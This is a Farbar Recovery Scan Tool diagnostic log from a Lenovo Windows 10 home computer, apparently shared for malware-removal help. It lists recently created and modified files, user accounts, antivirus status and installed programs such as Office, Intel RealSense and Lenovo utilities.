2016-05-19 21:39 - 2016-05-19 21:39 - 00002206 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2016-05-19 21:39 - 2016-05-19 21:39 - 00002204 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2016-05-19 21:39 - 2016-05-19 21:39 - 00002170 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2016-05-19 21:39 - 2016-05-19 21:39 - 00002162 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
2016-05-19 21:39 - 2016-05-19 21:39 - 00002158 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
2016-05-19 21:39 - 2016-05-19 21:39 - 00002148 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2016-05-19 21:24 - 2016-05-19 21:24 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Intel Telemetry
2016-05-19 21:24 - 2016-05-19 21:24 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Intel
2016-05-19 21:24 - 2016-05-19 21:24 - 00000000 ____D C:\ProgramData\Intel Telemetry
2016-05-19 21:22 - 2016-05-19 21:22 - 00001424 _____ C:\Users\Public\Desktop\RealSense Training.lnk
2016-05-19 21:21 - 2016-05-19 21:22 - 178658064 _____ (Intel) C:\Users\Jennifer JonesSantos\Downloads\Intel RealSense Installer.exe
2016-05-19 21:20 - 2016-05-19 21:30 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Comms
2016-05-19 21:19 - 2016-05-19 21:19 - 00002505 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk
2016-05-19 21:19 - 2016-05-19 21:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
2016-05-19 21:18 - 2016-05-29 15:44 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-05-19 21:17 - 2016-05-19 21:18 - 03191496 _____ (Microsoft Corporation) C:\Users\Jennifer JonesSantos\Downloads\setupskypeforbusinessentryretail.x86.en-us_.exe
2016-05-19 21:15 - 2016-05-19 21:37 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\MicrosoftEdge
2016-05-19 21:13 - 2016-06-16 16:01 - 00004198 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{363A2977-5F2E-4284-B223-61DEAF28E19B}
2016-05-19 21:12 - 2016-05-19 21:12 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\LSC
2016-05-19 21:07 - 2016-05-19 21:07 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Macromedia
2016-05-19 21:07 - 2016-05-19 21:07 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\NetworkTiles
2016-05-19 21:04 - 2016-05-19 21:21 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Intel RealSense
2016-05-19 21:04 - 2016-05-19 21:04 - 00002419 _____ C:\Users\Jennifer JonesSantos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-05-19 21:04 - 2016-05-19 21:04 - 00000000 ___RD C:\Users\Jennifer JonesSantos\OneDrive
2016-05-19 21:04 - 2016-05-19 21:04 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Power2Go
2016-05-19 21:04 - 2016-05-19 21:04 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\NVIDIA
2016-05-19 21:04 - 2016-05-19 21:04 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\ActiveSync
2016-05-19 21:03 - 2016-06-16 15:58 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Lenovo
2016-05-19 21:03 - 2016-05-19 21:03 - 00000000 ____D C:\Users\Jennifer JonesSantos\REACHit
2016-05-19 21:02 - 2016-06-16 15:58 - 00000000 __SHD C:\Users\Jennifer JonesSantos\IntelGraphicsProfiles
2016-05-19 21:02 - 2016-06-16 13:54 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Packages
2016-05-19 21:02 - 2016-06-03 11:08 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Roaming\Adobe
2016-05-19 21:02 - 2016-05-19 21:02 - 00019750 _____ C:\Windows\system32\results.xml
2016-05-19 21:02 - 2016-05-19 21:02 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\VirtualStore
2016-05-19 21:02 - 2016-05-19 21:02 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\TileDataLayer
2016-05-19 21:02 - 2016-05-19 21:02 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Publishers
2016-05-19 21:01 - 2016-06-16 15:57 - 00000000 ____D C:\Users\Jennifer JonesSantos
2016-05-19 21:01 - 2016-05-19 21:01 - 00000020 ___SH C:\Users\Jennifer JonesSantos\ntuser.ini
2016-05-19 21:01 - 2016-05-19 21:01 - 00000000 _SHDL C:\Users\Jennifer JonesSantos\My Documents
2016-05-19 21:01 - 2016-05-19 21:01 - 00000000 _SHDL C:\Users\Jennifer JonesSantos\Documents\My Videos
2016-05-19 21:01 - 2016-05-19 21:01 - 00000000 _SHDL C:\Users\Jennifer JonesSantos\Documents\My Pictures
2016-05-19 21:01 - 2016-05-19 21:01 - 00000000 _SHDL C:\Users\Jennifer JonesSantos\Documents\My Music
2016-05-19 13:08 - 2016-05-19 13:08 - 00000000 ____D C:\Windows\system32\LSC
2016-05-19 13:00 - 2016-05-19 13:00 - 00000000 ____D C:\Windows\Firmware
2016-05-19 12:58 - 2016-05-19 12:58 - 02365304 _____ (Microsoft Corporation) C:\Windows\system32\WudfUpdate_01011.dll
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Public\Documents\My Videos
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Public\Documents\My Pictures
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Public\Documents\My Music
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Default\My Documents
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-05-19 12:50 - 2016-05-19 12:50 - 00000000 _SHDL C:\Documents and Settings
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-06-16 16:03 - 2015-11-03 15:28 - 00879220 _____ C:\Windows\system32\PerfStringBackup.INI
2016-06-16 16:03 - 2015-10-30 03:21 - 00000000 ____D C:\Windows\INF
2016-06-16 15:59 - 2015-10-30 03:24 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-06-16 15:58 - 2016-02-17 01:07 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-06-16 15:58 - 2016-02-17 00:53 - 00000000 ____D C:\ProgramData\McAfee
2016-06-16 15:58 - 2015-11-03 15:24 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-06-16 15:57 - 2015-10-30 02:28 - 00786432 ___SH C:\Windows\system32\config\BBI
2016-06-16 14:38 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\AppReadiness
2016-06-16 08:59 - 2015-10-30 02:28 - 00032768 ___SH C:\Windows\system32\config\ELAM
2016-06-16 07:20 - 2015-10-30 03:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-06-16 07:14 - 2015-11-03 15:24 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-06-16 06:55 - 2015-11-03 15:23 - 00335968 _____ C:\Windows\system32\FNTCACHE.DAT
2016-06-15 20:52 - 2015-10-30 03:24 - 00000000 ___SD C:\Windows\system32\DiagSvcs
2016-06-15 20:52 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2016-06-15 20:52 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\bcastdvr
2016-06-14 14:17 - 2015-10-30 03:11 - 00000000 ____D C:\Windows\CbsTemp
2016-06-10 12:10 - 2015-10-30 03:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-06-10 12:09 - 2016-02-17 00:53 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-06-02 12:50 - 2016-02-17 00:55 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-05-29 16:10 - 2016-04-04 13:58 - 00000913 _____ C:\Users\Public\Desktop\RingCentral for Windows.lnk
2016-05-29 16:10 - 2015-10-28 14:01 - 00000867 _____ C:\Users\Public\Desktop\TeamViewer 10.lnk
2016-05-29 16:10 - 2015-10-28 14:01 - 00000867 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 10.lnk
2016-05-29 16:10 - 2015-07-25 11:06 - 00000876 _____ C:\Users\Public\Desktop\Quicken Premier 2015.lnk
2016-05-29 16:10 - 2014-08-05 08:34 - 00001072 _____ C:\Users\Public\Desktop\RingCentral Softphone.lnk
2016-05-29 16:10 - 2014-08-05 08:34 - 00000852 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RingCentral Softphone.lnk
2016-05-29 16:10 - 2014-06-27 13:36 - 00000979 _____ C:\Users\Public\Desktop\HMA! Pro VPN.lnk
2016-05-29 16:10 - 2013-09-05 15:35 - 00001653 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2016-05-29 16:10 - 2013-09-05 15:35 - 00001043 _____ C:\Users\Public\Desktop\Adobe Reader XI.lnk
2016-05-29 16:10 - 2013-09-04 12:04 - 00000806 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\I.R.I.S. OCR Registration.lnk
2016-05-29 16:10 - 2013-06-07 17:17 - 00000296 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Linksys Smart Wi-Fi.lnk
2016-05-29 16:10 - 2013-06-04 07:45 - 00001677 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller X.lnk
2016-05-29 16:10 - 2013-06-04 07:45 - 00001665 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat X Pro.lnk
2016-05-29 16:10 - 2013-06-04 07:45 - 00001050 _____ C:\Users\Public\Desktop\Adobe Acrobat X Pro.lnk
2016-05-29 16:03 - 2016-02-17 00:56 - 00000000 ____D C:\Program Files (x86)\Intel
2016-05-29 16:03 - 2016-02-17 00:55 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-05-29 15:43 - 2016-02-17 00:53 - 00000000 ____D C:\ProgramData\Package Cache
2016-05-29 15:38 - 2016-02-17 01:05 - 00000000 ____D C:\ProgramData\NVIDIA
2016-05-29 15:35 - 2016-02-17 00:55 - 00000000 ____D C:\ProgramData\Adobe
2016-05-29 13:20 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\system32\NDF
2016-05-29 12:18 - 2015-10-30 03:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-05-29 11:25 - 2016-02-17 01:05 - 00000000 ____D C:\Program Files\Intel
2016-05-29 11:25 - 2016-02-17 00:56 - 00000000 ____D C:\Windows\System32\Tasks\Intel
2016-05-29 11:25 - 2016-02-17 00:56 - 00000000 ____D C:\ProgramData\Intel
2016-05-29 03:45 - 2016-02-17 00:53 - 00000000 ____D C:\ProgramData\Lenovo
2016-05-28 20:32 - 2016-02-17 00:55 - 00000000 ____D C:\Windows\Downloaded Installations
2016-05-28 20:32 - 2016-02-17 00:53 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo
2016-05-28 20:32 - 2016-02-17 00:53 - 00000000 ____D C:\Windows\System32\Tasks\Lenovo
2016-05-28 20:32 - 2016-02-17 00:52 - 00000000 ____D C:\Program Files\Lenovo
2016-05-28 20:32 - 2016-02-17 00:52 - 00000000 ____D C:\Program Files (x86)\Lenovo
2016-05-28 01:55 - 2015-11-03 15:26 - 02718208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2016-05-22 18:24 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\rescache
2016-05-20 03:40 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\appcompat
2016-05-20 03:31 - 2015-10-30 03:24 - 00000000 ___SD C:\Windows\system32\F12
2016-05-20 03:31 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2016-05-20 03:31 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\system32\oobe
2016-05-20 03:31 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\system32\appraiser
2016-05-20 03:31 - 2015-10-30 02:28 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-05-20 03:31 - 2015-10-30 02:28 - 00000000 ____D C:\Windows\system32\Dism
2016-05-20 03:30 - 2015-10-30 05:05 - 00000000 ____D C:\Program Files\Windows Journal
2016-05-20 03:30 - 2015-10-30 03:24 - 00015703 _____ C:\Windows\system32\OEMDefaultAssociations.xml
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 __RSD C:\Windows\Media
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 ___RD C:\Windows\PurchaseDialog
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\Provisioning
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-05-20 03:30 - 2015-10-30 03:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-05-19 21:22 - 2016-02-17 00:58 - 00000000 ____D C:\ProgramData\Office2013
2016-05-19 13:04 - 2015-10-30 03:24 - 00000000 ____D C:\Windows\system32\WinBioDatabase
2016-05-19 13:00 - 2016-02-17 01:06 - 00000000 ___HD C:\Intel
2016-05-19 12:50 - 2016-02-17 00:56 - 00002212 _____ C:\Windows\System32\Tasks\PDVDServ12 Task
2016-05-19 12:50 - 2015-11-03 14:11 - 00000000 ____D C:\Windows\Panther
==================== Files in the root of some directories =======
2016-06-15 09:17 - 2016-06-15 09:17 - 0007600 _____ () C:\Users\Jennifer JonesSantos\AppData\Local\Resmon.ResmonCfg
2014-09-10 17:15 - 2014-09-10 17:15 - 0000057 _____ () C:\ProgramData\Ament.ini
2016-02-17 01:08 - 2016-02-17 01:08 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2013-06-04 13:25 - 2014-05-26 08:49 - 0006680 _____ () C:\ProgramData\hpzinstall.log
2016-02-17 01:08 - 2016-02-17 01:08 - 0000102 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.64.bc
Some files in TEMP:
C:\Users\Jennifer JonesSantos\AppData\Local\Temp\0202361466076463mcinst.exe
C:\Users\Jennifer JonesSantos\AppData\Local\Temp\LMkRstPt.exe
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-06-13 15:27
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:16-06-2016 01
Ran by Jennifer JonesSantos (2016-06-16 16:20:50)
Running from C:\Users\Jennifer JonesSantos\Desktop
Windows 10 Home Version 1511 (X64) (2016-05-19 16:58:52)
Boot Mode: Normal
==================== Accounts: =============================
Administrator (S-1-5-21-4252830516-2523568588-2152128588-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-4252830516-2523568588-2152128588-503 - Limited - Disabled)
Guest (S-1-5-21-4252830516-2523568588-2152128588-501 - Limited - Enabled)
Jennifer JonesSantos (S-1-5-21-4252830516-2523568588-2152128588-1002 - Administrator - Enabled) => C:\Users\Jennifer JonesSantos
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0E0F06755100}) (Version: 15.006.30174 - Adobe Systems Incorporated)
Adobe Reader X (10.1.7) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.7 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{26356515-5821-40FA-9C3D-9785052A1062}) (Version: 4.3.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{C2651553-6CA3-4822-B2E6-BC4ACA6E0EA2}) (Version: 4.3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: - Apple Inc.)
catch (HKLM-x32\...\f7676494-bff8-4d89-ab7c-d353e2d37ed8) (Version: 2.02 - Lenovo)
Dolby Audio X2 Windows API SDK (HKLM\...\{6A478BF2-F67F-4ABC-A7F1-B6B5BA862371}) (Version: - Dolby Laboratories, Inc.)
Dolby Audio X2 Windows APP (HKLM\...\{7DA57EF8-9D20-4126-AF15-D0CC97D0C017}) (Version: - Dolby Laboratories, Inc.)
Driver and Application Installation (HKLM-x32\...\{6EC299C6-074C-4529-8D5F-2798584BB27B}) (Version: 2.02.1125 - Lenovo)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 51.0.2704.84 - Google Inc.)
Google Drive (HKLM-x32\...\{709316AD-161C-4D5C-9AE7-0B3A822DA271}) (Version: 1.30.2170.0459 - Google, Inc.)
Google Photos Backup (HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\Google Photos Backup) (Version: - Google, Inc.)
Google Update Helper (x32 Version: - Google Inc.) Hidden
GuardRadish (HKLM-x32\...\c7bee6ad-7eb2-4bfe-9c1e-4b78ca25f73b) (Version: 1.09 - Lenovo)
Intel RealSense Training (HKLM-x32\...\Intel RealSense Training) (Version: 1.16 - Intel)
Intel® Chipset Device Software (x32 Version: - Intel® Corporation) Hidden
Intel® Data Collection and Analytics (x32 Version: - Intel Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: - Intel Corporation)
Intel® RealSense™ Application Recommender (HKLM-x32\...\{88175687-39eb-4709-9b6c-ff3995fc2170}) (Version: - Intel Corporation)
Intel® RealSense™ Depth Camera Manager Beta (x86): dptf_com (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ Depth Camera Manager Beta (x86): Intel® RealSense™ SDK info server (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ Depth Camera Manager F200 (HKLM-x32\...\ARP_for_prd_dcm_runtime_1.4.27.52404) (Version: - Intel Corporation)
Intel® RealSense™ Depth Camera Manager F200 Gold (x86): Intel® RealSense™ 3D camera IO module (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ Depth Camera Manager F200 Gold (x86): Intel® RealSense™ Depth Camera Manager Service (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ SDK 2014 Runtime (x86): Core (HKLM-x32\...\{AD1C5601-1C83-41CB-A670-7F02C1D0E72A}) (Version: - Intel Corporation)
Intel® RealSense™ SDK 2014 Runtime (x86): Core (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ SDK 2014 Runtime (x86): Hand Tracking (HKLM-x32\...\{1DA11DE3-2EC9-4DB5-9254-7644AC527476}) (Version: - Intel Corporation)
Intel® RealSense™ SDK 2014 Runtime (x86): Hand Tracking (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ SDK 2014 Runtime (x86): Hand Tracking: Models (HKLM-x32\...\{00BD3B4C-3D89-42EA-9E2A-14BFC9A1E3C9}) (Version: - Intel Corporation)
Intel® RealSense™ SDK 2014 Runtime (x86): Hand Tracking: Models (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ SDK 2014 Runtime (x86): Lantern Rock (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ SDK 2014 Runtime (x86): Utilities (HKLM-x32\...\{AAD0FFBA-8C49-45FA-B93B-C356FB610E06}) (Version: - Intel Corporation)
Intel® RealSense™ SDK 2014 Runtime (HKLM-x32\...\ARP_for_prd_rs_sdk_runtime_v5_5.0.3.187777) (Version: - Intel Corporation)
Intel® RealSense™ SDK Runtime (HKLM-x32\...\ARP_for_prd_rs_sdk_runtime_v6_6.0.21.6598) (Version: - Intel Corporation)
Intel® RealSense™ SDK Runtime Gold (x86): Core (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ SDK Runtime Gold (x86): Data Collector (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ SDK Runtime Gold (x86): Hand Tracking (x32 Version: - Intel Corporation) Hidden
Intel® RealSense™ SDK Runtime Gold (x86): Hand Tracking: Models (x32 Version: - Intel Corporation) Hidden
iTunes (HKLM\...\{9F4BF859-C3A4-4AB6-BDD1-9C5D58188598}) (Version: - Apple Inc.)
Lenovo Accelerator Application (HKLM-x32\...\{10672FE6-3D50-4F79-B0C7-A5573A5D415D}) (Version: - Lenovo)
Lenovo Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.8231 - CyberLink Corp.)
Lenovo Power2Go (x32 Version: 6.0.8231 - CyberLink Corp.) Hidden
Lenovo PowerDVD12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5320.55 - CyberLink Corp.)
Lenovo PowerDVD12 (x32 Version: 12.0.5320.55 - CyberLink Corp.) Hidden
Lenovo Product Demo (HKLM-x32\...\{BCB7EAB5-4BB4-49E9-B555-23395E689EDA}) (Version: 1.0.2 - Lenovo)
Lenovo QuickOptimizer (HKLM\...\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}) (Version: - Lenovo)
Lenovo Silver Silk Wireless Keyboard (HKLM-x32\...\InstallShield_{B88AD4F5-58A6-425D-9282-92228FEB7067}) (Version: 1.05 - Lenovo)
Lenovo Silver Silk Wireless Keyboard (x32 Version: 1.05 - Lenovo) Hidden
Lenovo Solution Center (HKLM\...\{AB46AC6D-3E9A-4484-8061-64FF10301B41}) (Version: - Lenovo)
Lenovo System Interface Foundation (HKLM\...\{C2E5CA37-C862-4A69-AC6D-24F450A20C16}) (Version: - Lenovo)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Solar App 1.10 (HKLM\...\SolarApp) (Version: 1.10.3 - Logitech)
Logitech Unifying Software 2.50 (HKLM\...\Logitech Unifying) (Version: 2.50.25 - Logitech)
Manual (HKLM-x32\...\{693F92E5-37D1-46B7-A0D6-19A74A2FD0EC}) (Version: 1.00.0701 - Lenovo)
Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0010.00 - Lenovo Group Limited) Hidden
Microsoft Office 365 Business - en-us (HKLM\...\O365BusinessRetail - en-us) (Version: 16.0.6965.2053 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23019 (HKLM-x32\...\{2883cce3-040d-45b1-a27a-07934a6d47ec}) (Version: 14.0.23019.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23019 (HKLM-x32\...\{5184c1f9-e1f4-47ff-82ee-92712c162393}) (Version: 14.0.23019.0 - Microsoft Corporation)
Norton Security (HKLM-x32\...\NS) (Version: - Symantec Corporation)
NVIDIA Graphics Driver 359.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 359.10 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.6925.1016 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6925.1016 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.6925.1016 - Microsoft Corporation) Hidden
PCmover (HKLM-x32\...\{918AEB5B-C364-4938-8B35-7618B71D4616}) (Version: 8.20.635 - Laplink Software, Inc.)
Qualcomm Atheros 11ac Wireless LAN Installer (HKLM-x32\...\{20CA507E-24AA-4741-87CF-CC1B250790B7}) (Version: 11.0.10164 - Qualcomm Atheros)
Qualcomm Atheros QCA6174_9377 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: - Qualcomm Atheros)
REACHit (HKLM-x32\...\{4532E4C5-C84D-4040-A044-ECFCC5C6995B}) (Version: - Lenovo)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29088 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - Realtek Semiconductor Corp.)
